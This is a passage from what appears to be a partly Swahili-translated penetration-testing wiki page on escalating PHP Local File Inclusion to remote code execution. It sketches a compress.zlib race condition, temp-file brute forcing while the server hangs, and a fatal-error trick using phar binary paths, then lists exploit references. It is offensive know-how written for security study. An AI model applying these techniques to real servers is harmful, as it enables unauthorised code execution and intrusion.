Kupitia compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

If you found a Local File Inclusion and you can exfiltrate the path of the temp file BUT the server is checking if the file to be included has PHP marks, you can try to bypass that check with this Race Condition:

LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure

Kupitia eternal waiting + bruteforce

If you can abuse the LFI to upload temporary files and make the server hang the PHP execution, you could then brute force filenames during hours to find the temporary file:

LFI2RCE via Eternal waiting

Kwa Fatal Error

If you include any of the files /usr/bin/phar, /usr/bin/phar7, /usr/bin/phar.phar7, /usr/bin/phar.phar. (You need to include the same one 2 time to throw that error).

Sijui jinsi hii inavyoweza kuwa na manufaa, lakini inaweza kuwa hivyo.
Hata ukisababisha PHP Fatal Error, PHP temporary files zilizotumwa zinafutwa.

Marejeo

• PayloadsAllTheThings

• PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders

• Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core path traversal → arbitrary write → webshell)

• Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5

• watchTowr – We need to talk about PHP (pearcmd.php gadget)

• Orange Tsai – Confusion Attacks on Apache

• VTENEXT 25.02 – a three-way path to RCE

• The Art of PHP: CTF‑born exploits and techniques

• When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise